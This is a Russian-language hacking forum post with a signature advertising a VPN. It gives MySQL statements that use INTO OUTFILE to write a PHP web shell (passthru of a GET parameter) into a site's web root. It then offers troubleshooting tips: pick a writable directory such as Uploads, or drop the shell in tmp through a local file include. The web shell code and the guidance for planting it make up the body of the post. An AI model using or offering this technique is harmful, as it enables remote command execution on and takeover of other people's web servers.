CREATE TABLE `config` (`script` TEXT NOT NULL) COMMENT = 'config';
INSERT INTO `config` ( `script` ) VALUES ('<? passthru($_GET['sh']) ?>');
SELECT script FROM `config` INTO OUTFILE '/home/www/html/config.php';
DROP TABLE `config`;

Тока эта, поменяй название таблицы и имя файла...
Ато можно ненароком подменить настоящие.

#1 - Can't create/write to file '..\..\..\www\co2nfig.php' (Errcode: 2)

Найди папку справами на запись, например Uploads...
И путь подбери, вобщем экспериментируй.

Или если есть локальный инклюд, лей шелл в tmp.

эта тема не раз обсуждалась.поиск по словам "into , outfile"

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze